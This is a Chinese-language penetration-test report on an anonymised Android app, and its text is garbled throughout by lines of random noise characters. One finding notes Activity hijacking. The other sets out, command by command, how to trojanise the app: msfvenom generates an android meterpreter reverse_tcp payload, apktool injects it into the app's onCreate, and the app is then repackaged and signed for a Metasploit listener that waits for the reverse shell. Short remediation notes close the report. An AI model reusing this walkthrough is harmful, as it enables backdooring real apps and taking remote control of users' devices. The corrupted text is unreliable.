- n6 {3 V" I: T: ^ d; h & ?1 j8 T4 v, @5 Y# u% l
" ~" i+ s! `, M1 k
' m& F, t' G: ^& l" u( N, C( Z9 C4 c; h' ^( L
0 P1 \2 a5 A4 ^+ E- j q" V6 O W6 ]
2 检测结果 - |- y5 I" J4 Y6 S6 r8 A) J
j& |9 d" [4 R: ^
* n" L5 v, n# h9 |/ o: D2 i
& M. `( g: T7 G
8 ~ P2 p6 P3 I0 P6 X
1 t0 r, y* |! P( l3 ~ 2.1 某某某 5 \. U& u! h' m- @2 @
' w* A( p( o+ x6 C% r, L/ ]
. E3 N8 h- O, L# C3 \
0 O- m* i8 R& K' V
[ F9 S/ F8 {& T( |$ P( P5 m9 s+ ?
2.1.1检测目标 & x+ O& H5 L# E* x! g1 e
6 \; W# l& R* U
2 f' b$ e. P! d) b/ _1 u& l. s4 ^
- r T! b( \0 V3 E * `, _& m# B+ S4 @6 K# M
U0 s* I2 [: Z 目标地址: 某某某某某某APP H# Z* l2 Z7 [+ p" d# C
% P0 k! J+ g6 H; N; B
# L. D8 O- y) ]! t# f+ e
7 d7 v: @' h5 T' D
/ ~/ U9 Z) C4 O: N
0 ~+ y2 b i+ J$ S, Y% u9 S 2.1.2检测结果 % I2 W3 h+ V, ^: j4 m
8 t% a9 c: e! I5 s
; e3 v& K9 C) Z% r! |4 S% r) ~
3 r5 t0 Y( Q% s8 y7 H" l* y
% J* k# a$ c" v5 b5 N4 R4 h$ p: R: m) T1 f. M. q N, n, Y. B4 _: A8 N
2.1.2.1 + J% E8 s: ? L; V+ F5 l
& Y) @4 m+ x* d+ b& A; m/ I
( j/ [: p: a/ V3 V( N4 ]! h7 a# q3 K; r
" ]* `! @4 F0 u8 @: r( M3 y( W. y
2 E3 D3 l( t2 f% w% i9 v: M* f% c: m 漏洞链接地址:某某某某某某APP 4 T# q- c3 |" A' Z$ v/ r% P
( m$ {. h$ m9 D/ M" U/ G
* Y9 j9 @! e$ ]8 P
0 P$ @4 [) _- u" G, M0 F7 [
, [; y0 o0 e: S$ g' {
7 u2 `6 B# D0 _+ y4 H/ A
/ [9 j' F2 s* h% M& S7 y
4 S2 L8 w+ J0 E% i% [
0 Z. o; F3 z! d* D" Z
5 v7 H, ~2 ~+ T0 }. I7 _ % x2 e( n; ?8 M5 c, B
5 q& ~9 e7 ]3 A6 ^# ^; g
漏洞分析及取证: @4 Z4 p' q- v6 A3 b4 B$ z) ]* H
; q5 j, j: y( K
U% s& F* D- b, q6 a8 w# ~4 V/ y! m5 P3 q
, K0 ]1 ^. z# K
1 L& b7 ^2 |2 S8 Y, K& \& m
通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图:
# w7 W- A8 V) t- g0 b* m8 ~5 R6 [0 @, h1 i
$ ~' A5 A! n) N4 A8 Y) c
2 W- `: F0 u% I- A9 }5 F
) u5 I% f1 C. ?
L t: r) @6 Y: q( c1 X' e6 E
1 G2 b, A* E; L" H/ j# E
5 B' A% f3 w1 |) L5 J
/ Q% N$ r( p/ n3 _* E; `# k) k8 L4 S; S4 m% u! K, z7 o
- P/ R% x! B! z; h
) u5 G+ I3 V8 }5 }9 w0 `
$ P1 C* u2 p% R1 C
- C8 y$ i2 I- u" O* |
3 ?: M) P. [ t& K' {1 c- Q2 _& C0 m, Y q3 M
! {3 b8 N; O j1 Y
( G3 \, ]+ W- R( Z3 H
1 d2 ]0 Y% I' k: C
, K6 E7 o H: J- ^: }
. s$ \5 L( y7 ^3 u
& ]' z5 t! S0 f7 d# i9 a7 O! `
8 d4 |5 L/ p/ z
6 w: e* |' i2 {/ H- S. M
& W" m3 [4 b, _7 V5 O6 a, k5 q
8 w5 I0 x3 r) R+ e
, u* {5 R' d7 R- W; T+ R
( z, h" c( {; u- O- K7 T
. t1 s2 h, ~$ l& \1 E: s# C' I; i
/ k2 J$ P0 M. Q- p3 V+ Z9 F
" Q! |/ i4 A, i7 ~7 c
3 |) C! j: x. D! R0 O2 d, D8 f% `$ c
! p1 \* C: D6 }. l/ i3 v9 E) k- q& c- w, p H, c. O. M
% |+ m- ]0 R( \% X
- E d& A+ M% D$ @# R 漏洞危害:高 / @1 T# G; j! S" Z
# S. Q) U0 e, E% s+ V5 B+ ]
" R) e" m0 Z! m
8 [0 b+ l8 f- K, A
; N" h5 [5 L. A! j' d
* l; X: O( z2 s1 _& `& R
& V% Y. J/ \# {* c& c, y7 D# K0 m/ x7 y& [- d; b
( [& L* }( d, {3 h4 q
! ^( u K# N4 H
8 x8 `" i( U5 S2 x2 s5 R* [! N1 b; G t7 c
|
" x$ j* M: ~- A$ H2 A1 [* R; U& Q, ^: {0 {3 J2 N
* z$ S2 K3 F5 W! H |/ F7 `1 o+ v. N l3 V0 F( f
严重程度
g8 c3 ^& f9 A |. c% z7 o( s1 o( F' C$ u' i
5 [9 k" c( n9 R. M4 L! W
6 c' n9 d y( H _ |
" ?) R9 f) m0 {* O( y/ C. n7 K C
+ G" \6 G# |- u2 [- [5 {( g$ {/ c8 T% d( t# }2 c, F7 D- {2 t
0 P' p8 L6 F- r; c! r, W# `( X4 i
7 P. S$ W5 H% h3 A7 N4 O 高
; z% c9 f* V; n% T$ x0 M* {7 O& a& \. h' w# T/ f, C( c
" N2 g: ^% x) {: A+ i
7 M5 v! K& n! X4 ]# N8 X | * B" ^4 t* ~1 S# v4 k+ e% q- x
+ R2 R: ]6 V% y
7 I7 l/ |6 Y: v' W" T
* I. h! W6 P$ Y. r2 B, T! N6 V
7 m. L7 n" I$ a; W
( N/ M$ E8 S& ]. R1 D! H, I ■ 0 v( X! c( H# M( M4 ]
+ W& ?+ s) ~/ q P 2 T% ]. E) [ ]% e
+ p- m" t& M6 y |
6 X1 k. _( A8 O7 x" l9 L0 e
( a" c e" U+ B) U: @# g I : \+ Q" p$ D$ x4 k' `
. _. e% {: h; M. j3 k. [ ! o7 V$ P" [& z0 ]( I( m6 }( Z
B- S% C2 q+ |5 R- j
中
$ i- v3 M$ {5 |3 j4 F1 Z, O/ i' c& V' i; `" n: c
& Z P+ y+ S, Y# M
# Q9 e, Q; S& @0 D% M% `' q" R |
5 R" ?, n+ D+ q# o3 G+ B/ l
4 F; J- s1 q4 a0 j. y
! c' x* |9 U; W0 x7 ]4 p
& D0 s8 s5 p; m : f2 z/ g) s! [2 P' B/ S
0 e H& t; g5 s' Q; f; w ! E, P, z S3 | Q
5 D g& H7 L7 G n2 R
5 \! R6 h. A9 V! {, A* U+ `! o6 v1 H: e3 J8 W/ ~* K
| 5 L+ o$ b! F+ C7 F
7 g2 s) q0 W _
8 [ [0 T0 e. S/ _4 I
! x( _' `0 Q! f+ J8 ^, {- K0 E + P: M8 q! f7 }# v) T* A5 c
) s6 s; Q8 W" U4 d' V$ D, g* {
低 8 C4 B) \1 R: L/ w+ f/ n) d1 {) P
$ G$ n; S s7 z# R
. m) F0 @0 @( }$ k, B1 n+ K+ s7 }+ h( C1 \4 h7 g4 A5 |7 Q
|
E$ l+ X6 g. s+ ~# T$ x8 V9 R5 ?" Q; `1 s% {' T$ B" G, C6 u
) p& q$ a, |' N( P* L. ?1 I9 i
2 U& l+ G+ \8 n2 k' B- |
# J9 I6 l7 X, L. s! V! U y! N ^$ i' M
. u4 S) ~ A6 p8 _. S: n* t# N
( _: d% y; V7 | % t7 i9 r$ }6 H( O3 V- |$ h$ p
$ J; X( [8 w6 [: a$ \ |
" | F* z V: P7 }2 u* ^: Z3 Y% i- |& V! u+ C' h$ J
4 B- F$ B; C. S" z6 {
& Z$ r# Q5 @% \0 J
2 Y, J' E+ G; L/ b. f* f
2 N X1 b: @7 @1 o2 Y
) B7 j% l& z9 R1 R, L% M2 E
& K5 r/ {# x) @4 \
6 p( o9 \! ~( L, w9 p, z; G# | [9 N- w0 I$ H
0 J/ X5 @' k V% G. c2 f
5 z: w J, I' s/ S% q$ V
% `* k0 w/ K( u8 Z# c6 _
3 g8 M, a& }: a! W3 ~$ Z. j
4 I% x' X% y1 k5 w" s3 W8 P( C s6 |+ e; u x" u& ^
* F/ L- @: g& g% @: H' }
% ~$ }# Z' S5 z, w 修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 # Z* y2 @/ M7 }$ e
- Y8 r( T+ ^7 }' Q
! A' g9 b9 w" m9 |2 G1 o8 P
3 a3 l. ?! m) m! i% s. \$ f) R " s, |0 J# l0 @; l0 N
0 M9 e/ W& F: z$ v1 i 4 {- _6 t* r) ^' P$ W; T$ s: p% m
0 J, u; n( r# ]) a, R0 U' R
7 M+ I7 ?2 X# M( z+ ~/ q! @9 a
( z1 l5 c' b, [
9 p7 ~. L6 b4 }* A6 B. `4 I
0 w8 n( S" X( z( o' Z" ` * g' l1 M: Q. b: D: d; d, p
: w! c8 \$ k+ p3 Y% u
$ V7 a; D7 D, \* A' I
; y9 T# A5 e4 w# e& w8 b+ N% e1 Q# @# `
. o' S; n5 T7 @* `% N3 R) L. T; P ^& D5 {7 K
2.1.2.2
/ e+ l$ @2 D0 V+ F5 U3 w \/ r- m2 q. @8 [' E" h' c' p; f! y F( q
9 E2 j( J7 Q! Q+ w& v
$ R* B% @$ \2 p* K: s & p# s# G/ I/ P2 H& j' i5 |
$ u! m" {5 b% F1 I4 X$ P* }4 [
漏洞链接地址:某某某某某某APP
5 _! u7 \' o: y, W# M$ D4 E) A$ d4 Y& q* b6 L5 G
* G3 o. h9 l& \# z, O
0 C# G/ o1 h4 ^4 ^1 b5 n$ i* _
F% R$ @5 A4 @4 A# n+ |
: q+ D) y K9 `0 ^ 漏洞分析及取证:
! d! ]2 n4 G2 W# s& `( }0 u. e
+ F" o3 E. M# i3 z$ A0 e
8 H% D& m+ b8 T9 k8 X( @: b. ]* F& B ?8 a/ { y+ x( e
& M' W, ^* ?+ E$ a$ L0 L+ R+ h1 e+ w C
通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下:
0 D5 U/ N* p8 i: [; C O. A5 J4 `5 O' |
( C- {* Q p- u1 c* l$ C! _: S# G3 E
: A- U5 U S# v ! }) n$ a: l( v& @: `
+ b+ y, O! s( Y; f4 Q 用Metasploit 生成木马 apk $ h7 ]* `0 Y0 Z2 R- k: ~
% v/ a' {% Z7 L8 k7 {: ~! H5 t
9 |% ^5 u9 e; p. | X# _7 c& x
; f3 `6 k* A! i% k, \! ] 0 v5 R1 J& o1 e( m1 }* U
# h, }# t* L9 a
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk
1 R$ i$ O" I8 y! X6 k1 O* @9 m6 j. y% J2 R2 P
- a) W o8 F, A5 D# O+ Y
% Z: R* e# |: N ?# ?! Y& C
5 c+ [" X+ [ Q2 j6 b6 s
) c& H" X" ]8 L% {# N. k, T( P 反编译目标apk和木马apk
) X7 K: x, P7 k$ o1 M& r8 w9 o5 W9 z, E# @; L' B& u
2 }6 p" M# ?7 C u: l+ W# P0 c
6 v* d, |7 ?, r* z2 ` . E5 K3 D% c- F+ W' H' g
7 A: |0 o( Z( a1 F* W0 q* n3 b apktool d target.apk
- d7 @& y( l9 C; a& @- W9 U/ [0 j5 _7 u! ^6 a1 g4 \) l
apktool d cockhorse.apk
8 o, I+ Q- E% F4 V- e* ?
" i/ G" q$ l6 B9 r7 R+ _
+ J. U+ S/ I- y
6 M5 J2 ^, d- f/ S3 C: m) r
- V( Q2 L/ K8 [) o8 a5 V( L" A5 ~+ T
木马 apk 注入目标 apk ' _2 W; M3 F" R5 i8 M$ U4 t& e
! y& G8 H/ ]5 u: W
2 z5 C: O, u4 i( l, M
. q$ A! F' q7 H" E0 }$ k
) P" A3 ^4 f5 I# s
: g* K' c( Z3 ?' h3 }4 N5 \& H( \: j 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
% s! D2 T8 D4 Y1 f* ^: G) c& h3 S: T+ A/ y1 w* \* k
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V : F5 {/ x* F7 Z1 s: S7 K: p
) I: y' R8 y; ^9 @5 f3 r
0 B" k3 N7 W. L( C. m$ t7 d
& a+ }) ]" F8 q 4 [' |% B8 |& @ B% n: g0 w
. u, `1 ?2 ^ i4 \+ j8 [/ ?$ [. m 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复
, j6 n8 p! i, J! Z. e4 d5 L! b1 K4 N% u, S! O# q. T
& A0 K4 n" n' G) l6 `8 f7 q; l- }. U
& b" R8 ~4 P3 X9 x) m! ?" b! m7 I + k- ^8 s; X* l4 f a7 n& N
" ?! Z" w. r" U7 a$ p
将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下 / @$ a: L7 H5 {+ u! `; D7 D, L$ S
$ ~2 L8 f; b, ~: [* d% J& Q A" L
+ o1 P+ l3 _! k5 O' S# n: u( P$ L, I
- \- d) j9 j) d8 b
8 y+ S3 s4 |& K) u. R5 c) I% B& t+ [3 M+ e' l$ e% v
回编译生成最终 apk . T2 D9 x# B7 v3 d+ L
9 b) B8 h6 b* _) m# I0 I8 N
) I6 p: H9 j5 Z& D$ j7 K: B) F
1 N9 f+ m" q& X+ F
! W/ p8 h9 r, |( |8 b9 z
, J7 D: {- t3 s/ d4 a 重新打包
* u1 D9 M, T/ O' ?: b* E5 s: P7 Q$ d6 Y
; o9 D; u9 E* u) [! {$ e$ E2 O1 s( J3 g; |" q5 [
9 N! f! I+ e- u$ M2 R
* ^" f! |9 Z- h" E7 b apktool b -o repackage.apk target_app_floder
- g4 t6 p+ L0 {: t4 q5 P/ E) u) Y8 i2 B/ A
) q1 |3 e0 |; `- ]* ]3 Q# O0 \. q6 i3 k* t( _9 R% f/ @! a
$ X$ a4 G8 B* f) n- H
6 R! c- n3 j+ z 创建签名文件,有的话可忽略此步骤
0 g8 i0 e# w2 | d8 g9 q
$ V( @5 R) W! @7 t! u
3 R C. E0 N3 b9 F& p
5 \( c6 P3 d* K7 M$ w
o; X# w5 a& l/ F' Y$ @) d; W! s* ]# V) ^% G& I0 V e* \. |
keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 ! X0 b) a# k8 v3 d I+ H! v0 _
2 O: ^+ D \3 j E
; m6 o9 t# y+ r
0 R7 c0 B1 A# Q8 h$ L& x. J# { $ [0 U9 P9 n5 {: a5 S2 `; M* ?. ^
) {* O( w! q" M8 h
签名,以下任选其一
" }' a* s) m% A% v- P- W R; {/ S) s7 L. E
" b2 I+ l( H# j
5 z. P+ s+ c8 [8 I {$ e! P! H
8 r, f$ K" @. q- k+ {3 f$ Q& v3 s4 Y/ v, R
jarsigner 方式 : D% w0 \9 u9 N) n7 q: [- N( ]) y
" C! u K5 e6 j3 a! L4 S4 F% B
M, p- F" }* t. U! I1 E. S
' j1 p9 L5 v& A1 @- G s. t
u1 [/ s, g# l* s8 s
2 F1 x6 V" K% z# i: U jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 0 j6 [ I" A' S: f4 A
7 U* ~+ ?$ b+ d4 m$ J4 g6 W/ r
9 D% @: M, _! |4 `) R* Y2 d5 y6 `7 h7 N9 d2 m8 z8 ^0 B$ A+ h
# {; N- [' j3 d( e
* m( p# b$ s) ?7 M apksigner 方式 5 k: ~4 t9 p& A1 G/ H7 T, _- M- e/ |
+ y6 H C4 Y# g, E
s& G2 x/ G/ g8 V* O) W* i2 P: J$ g
0 k; N. U4 q. ]0 C
/ A9 p; h' N5 y: v: l v; R4 q" l
9 h$ E4 @( b1 N$ m* b8 ` apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk
- c r& C- {0 t% X! R5 T) A( ^7 C! ]- P
- u" \2 U' ~. ?5 M4 t% W; l8 H; ?* B8 P! b$ Y/ i
# O/ R4 j+ D2 i4 N
! ~8 Z2 C- m2 ]3 |" z! j3 l 如需要禁用 v2签名 添加选项--v2-signing-enabled false 6 @+ a9 a, P7 e* k0 K- F
, Z! z) h0 T) F6 A! `3 K( M$ c# [
3 {3 R# k- a" q4 G$ t9 C3 T
# T; I. r: o: h
) a; E. X3 t! t1 f: @7 o
0 w& d# p T6 h 验证,以下任选其一
0 |+ w9 w3 r7 a4 B8 y* L$ n/ i
5 o( S" J4 Y9 @
; U6 E" W0 c w- |; {( W8 \( O
- ^* v; `. S: A
$ i# b* Z Y# N+ E9 I
( Y0 k" s' d5 N% u5 m
jarsigner方式 5 m( F! t+ {, h
7 w l* t7 {* V7 B; n6 @' d8 j
3 _- G) q( `6 e9 v' i! |7 V6 V p6 H/ T, h$ R; C5 z1 h
: _* a: n, ]) k4 \2 L# Z8 R, B2 g
6 w! G9 S3 X7 u( G jarsigner -verify repackaged.apk , {/ b' X9 |' d- |: L6 V6 f
& I- W% I0 `% H8 F/ [ L
0 }5 X" p5 L% Q/ O; j# i" L; v
7 H. z6 d7 S$ u; m+ H$ K' h+ F 7 c+ f6 F6 X) c5 \
) b F2 o8 Z( a0 A6 A apksigner 方式 7 F9 v/ p% J( h% J' O9 ]! |% F
# Z1 Z- z5 b/ N+ L5 ^3 U# h
/ c" `' C, H: `6 B! o0 e6 {0 a+ F8 C+ J+ m: Q8 M2 j
/ q+ |6 X; D9 n8 C) b3 [+ t
% P/ V& q) w( {8 N
apksigner verify -v --print-certs repackaged.apk 4 z h0 a) P1 e5 \# S
5 u- D) p' ?1 V# W/ P: ?! o, @) a
& B" Q( n6 n$ m; s% ]) P% q* I
$ o6 `3 g! o' y
( w4 B7 P0 w4 {5 Y9 ^, [' j! l( l* Y# c+ P- l9 }; h6 Y, M/ W
keytool方式
! g1 A! L8 b5 \5 y- m6 l* s0 l& F h. Q% e# f2 K, W# }
$ V/ r: Z* h8 z/ Y9 U
$ ?6 _( J2 s1 }# K
& q0 N) f( x+ z, n+ P6 } w! J# K
, H- g# B9 I' n keytool -printcert -jarfile repackaged.apk
, C# I- F. d# z# g- S7 K6 P. [1 c" v4 _6 ]3 H9 `
. a4 U4 X8 h9 x3 }; F$ B: n! w C2 A% D4 g% \+ M! p
+ W$ A9 M |; \: |. Q. K7 q9 m0 l. y7 e, x" m: C% q
对齐 & t1 E7 }5 E% M0 r
4 M. l. A, B# y
k8 [; S, j! b% f. Z. H/ k
5 D) J: R% D1 e$ z+ N* y. v; c% T
, P; V' V, [# E* b8 |& t: R0 `+ C' ~
字节对齐优化
9 H8 q( U# V' u" X2 m: f% O7 T! R0 n/ a3 }' R- p) X6 R
2 Q N1 f$ {7 s, i/ T4 R8 G( i& {
/ M* s, a C, p- `! C/ g
6 _; m% {: X% m2 h, ]3 a% Z" R7 `& M; H+ j0 J0 u
zipalign -v 4 repackaged.apk final.apk " l5 y5 L& P' Y
. U0 B- h; }$ _ I9 j* E1 ~" W
3 `2 n8 F9 ? j! t
* r/ i, P7 [( ?
8 H: ]; ^1 o- H* H7 O
8 W w" }% K! Y, j! z t# T0 ?* n 检查是否对齐
' v: B) {/ X4 r9 K# G* G( `. s( P9 O
( ~6 c. b! q# Y! C4 v
- j, w! u, x& J% g6 {5 a5 ?
8 A$ V" j9 i ]/ M3 `
9 _$ B! r0 q) U3 e1 x* O
) ~2 s% {& P0 B9 d) P zipalign -c -v 4 final.apk
. S2 |/ A" t# \1 g% V7 h# p- `
( V9 q) G5 s' a5 u! w: _
- X. L# s P. A
1 M" g+ X; _, G4 y! \ 5 c- ?- A# M* D7 Q0 m
4 h0 E3 |" b* D5 A6 G, h2 v6 I) ? 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 0 z; V3 p' |7 Z4 {3 K8 C1 Q
' Y, T" \1 b" F' @* o! m
9 r5 V5 R. F5 ] S! P5 q' D8 B( V3 ]% O
/ R$ }+ w: D% ^9 q g$ ?! J8 g s( z: p! w0 D
启动Metasploit控制台,配置参数等待上线 + O9 G6 ^: j/ m7 y' e
0 l& T' E. H3 X
% ~' i/ ~& @7 C/ X
5 ]+ z }$ y- k% y" E
' {; N% B7 B7 Q: M7 t \- m. i
- `0 W' P* w( ]* r. v) F" k. i% i% q$ Y 在终端依次输入如下命令 ) Z2 J: e! h' a" w
5 L+ j5 t5 k' V
8 N/ E8 }) [9 V/ _3 g
$ {6 C3 z/ {# a) R
/ x2 U$ ]4 _/ o6 f5 i1 v8 D
- y0 X5 J* R+ E5 }# {) e
msfconsole
0 ?& A0 {& |+ }' W, R) C6 Q# n% D' S( e+ w3 D9 h: ^; r1 n
a3 D' Q; Z- s$ D5 j z- w: Z1 h' _& f J9 Q! G/ k, l; B
$ p. y. K" ]( {, j9 f f: J+ W; `
use exploit/multi/handler
1 u, z% ]$ T. G# I3 O/ ~! l: `1 V/ U: O; `+ {
; j' |1 E8 P$ ^& [; C2 x
: }7 T- W6 ]! t2 b+ t! s
6 l9 f- x- p# F$ {/ Z$ m8 Z) m( d% l/ |$ E+ y7 J- C
set PAYLOAD android/meterpreter/reverse_tcp
. @2 M/ u8 n3 c3 k7 B' P6 A0 R1 t/ V6 ?) Q- u l- h1 ~1 _; _
3 m! j7 G: P/ h- M0 b# ^3 j( |* W: M: g, r; ^
9 V8 c/ m* Y/ t: ]8 ^- ]# w
: ?1 J! B& I& @ m0 J) _1 B1 v set LHOST 192.xxx.xx.xx ! h: h, M, q; B0 a5 L% ^
y( e& o+ s$ C" b3 p2 L$ o% w+ z
/ l; E3 m# f' P8 ^: v& O+ I. k7 ]" t( s+ \. A
9 J6 @7 R. z3 w. K/ H9 V5 I9 D" J2 ?9 f9 @, M5 @5 ?# C0 Q/ l7 K7 _0 L
set LPORT 4444 9 J8 b) j' D6 `! P. X- R: M
( T; [6 W2 W- s8 b
* t7 K1 h- `8 z) I3 S8 S) S$ Q$ w2 a" r6 I" |! [4 a
( d1 K g! P2 O2 o1 f8 ^/ ]4 c
$ M2 a4 I. ~0 D( N exploit
! h& @7 G1 Z# i+ K9 L
6 W. F) M/ y! e( ?7 ~& s' Z
# r1 w5 E$ z) n% t- t
" R. v ]) J/ |
" [- k2 f1 k! T" h+ n/ ]; g7 L- C8 g& ~
之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:
; ^1 R8 n6 _% u" f1 c: P# |2 R7 Y
5 e* }3 b) r! X O: u
* r* S, y* e7 i8 i4 T/ n0 B4 t
/ C: x" Q Z% a6 V% x0 H1 z5 F9 R " |/ G" M1 }) ^$ @
$ c3 Q: v* j, E/ p
漏洞危害:中 7 W7 `0 b/ M, o+ V+ ^
. p1 M4 B' S4 m4 a5 e
& x: Q- c: i4 z& M
# Q1 N9 e, c9 ?* w4 n1 H
/ ]9 H: n8 `4 |- o' b
4 C$ H5 b+ N0 j. C0 Y
$ h* d$ `+ E. } Z5 }7 n# S1 I7 f4 t3 Z0 x$ S
9 L! g( U0 _. ?2 d) x8 Y; d! |. B
5 {! _0 x) }4 A& z6 I: w
) p. A; f9 m/ @; v" I) B6 l$ q. h: B3 }& K3 w- V
( _4 k) [% t5 X% ] x8 t `
3 ]* D3 h, S$ J! J
| & h+ l9 f" {- W
% J9 R% [; P" M: Z! g
8 E V, y3 C! x5 K2 R8 m- c8 G: m4 i( R* Y
严重程度
) Q; U+ S* `" u8 ^: T' r/ C8 T+ @5 t4 m
8 W! O1 }6 ], ^: |3 @# _: v; k
+ P4 j7 q, _' ?3 a0 W | $ M8 t7 P4 V/ z
7 H+ M7 V) u6 u `
0 g0 z+ a" [7 V6 |8 K# N) o, ~$ Q6 t/ k) l' `& w! w
8 u- k7 W& u; h6 I! U" n
# k9 o" A- N& P# m 高
/ p! i* \0 X; L3 t+ u! p2 W
" M5 d( f5 v4 v4 ]8 }9 H, N' f
4 E# b8 ] R! I
* `: e4 O/ T/ x( t0 k |
0 b) T& J7 k2 r
" [ e2 y2 R& ?1 `8 l+ m! A* r" L, m 0 h- z4 Q& j @; J* e3 H5 K
+ O; Z8 S" I5 I; B
S( P; R& I: Q. A& ]2 l9 l
4 n) N1 z1 b+ z ■
$ V, U, I! z9 T/ Y& G! @& A8 I% g5 V. z5 Z; D. s+ R
3 j' V* @* [* n t1 i) R2 y$ y
B& { T" V# `2 c
| ! t* A1 k1 l) R& z- e, _
: O3 C6 Q' M5 d' A5 ]
- C7 B5 ]# {! Z" m9 K/ V9 d2 ~: T! Z& Y, q9 t( t& Q# y6 `, {
9 z% a+ B1 l- [$ ?4 I
* i4 P8 F7 z! x- ^ 中 ! l4 Q( z: z$ Q
3 a* s; E- e8 I5 N u2 L; J1 T
" y+ Q8 d6 h! w4 L4 z: @, H+ f; c. r1 U* i4 Z7 v; R" s
| ) I2 G+ _/ Z t3 h- ^! W( V5 J2 v
0 q2 g- l; p. x: F ) e t) ~. Q; ^8 V, K0 L7 b4 l$ x$ y. c
- Z- C. }8 a: C/ X. { k0 a' I
5 B6 |& t8 o1 L7 F, T
! `+ n; p: t+ k" ]3 h5 N
3 O. @- h% M8 p7 [! k% U; |! ~) W e( q/ ]7 P
% B2 ^8 X7 t# `# n
5 {/ U" R7 E: l/ x
! [. T& X2 f1 T k9 `& ^/ h9 P" `8 p9 {$ |+ \. g/ `
|
! }. p+ W3 m6 t+ c$ r8 Y8 A
) {9 F2 H, o( W7 U% G
r1 n4 Y' O- m( i; |3 w! e9 `3 Y9 N% Z# T1 k
6 M. Z5 x7 x" c
( \8 Y& d1 b6 a0 N r- K 低
& w. Z! j' V- ~& i; b
9 g* K& X/ X) g6 G% l% i+ f& \ , G/ p, n1 a5 u+ B6 j/ A' w
7 d3 z/ E5 H) i4 W! H# e: R: A, r |
! ?: A# _6 X( A+ _ f$ R
6 r# x. B1 |) k7 m/ e, T2 R
; w- a Z4 c+ Y3 v! y4 K* Z) _, @. C/ n: Y$ \4 k3 D( P( r8 J4 u+ r" Z6 Z
3 a) I9 H! Y5 s I6 J4 K- _2 q ], a: u Y# I/ o2 ~
( H1 Q/ w, ~# c% p, n5 d- g
% D+ w6 W+ C3 f; p
1 w) ]7 R; {" Z& h+ z$ D! w; C
& |0 S2 ~6 I' Z! ~* h$ f
0 {7 Q$ ~0 V$ i# p: L' g) N
2 A) \8 e3 \0 m$ s- d |
3 X6 v$ N; T. d0 ]6 e1 f* b1 P/ a4 ^2 _' Z
* v$ H" Y2 ~& G4 e# E5 B
+ u% H8 o, x0 u( ]6 H* q
7 _# i& y. i: W! l
# r$ f X- R% f! T
% i" C- G0 l" a- w: Z; a
& q1 w+ w/ ? b' ]/ n( n* l, o
3 X; A% b& Q- v3 W1 W5 o' Q
% q- L- A+ Q T0 C7 a3 U8 f) O6 x* K 1 F5 k4 ^! Q- W$ g; y$ b- y
$ \* P' C1 P5 f6 h, z& N m
3 Z& e% o3 w- X
! s" ~, v) u. t" }5 W
4 n D4 r8 @! `0 y
( s( D; g% H3 u
# g) b& L! L5 ^" c$ P
) T4 w$ o2 `( z. | 修复方法:
) T) r7 F' M' A1 b. t. L' i& {- S/ @! z# ~5 R0 m
7 w0 h- Y. W1 ^2 `4 M" c' v: t
1 `0 y+ l. F- @$ i& @ # Z! }8 e) Q8 @! ]7 E- e _3 ~
& n% A4 z+ q ]7 N2 b* O% H0 m
1.在 APP 启动时应做签名校验防止二次打包。
) q; [ s8 K, ]1 L9 ^
% |/ [% b) i, j; o, D 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 5 u" {+ f4 u& t( y
9 t0 ]- Q4 K, M/ n4 ^& C
5 N; f! _- Q! {0 m% @2 W7 f
- F! f/ |" ~2 P
1 F, v5 P+ O3 h8 |1 F( t; ~2 T& O/ {5 j/ ^* X, m% [
' F) V u+ ^* B0 N7 ^+ o* x1 Q/ z- j6 r
9 u/ ~ }6 L0 ^9 r6 b. }' V* Q% q
7 \, d$ h" s" }' N) N+ U, c
4 [ r$ Y& L {$ R% k+ f) ^( u# M4 r( ^% g+ @" A$ P
3 o6 U8 @6 a8 X' R
1 m$ T0 M% d0 s! N5 T, u) R3 Q
5 l$ [: U8 J: T+ W- h; z# U5 c. M- \6 Y/ T
+ A+ m' v9 w ~
. p& h0 u$ L0 @7 ~
3 Z3 J* i0 g1 |/ ~0 T$ u! U8 m
' Z- g7 H+ @7 Z" {. q; j6 Q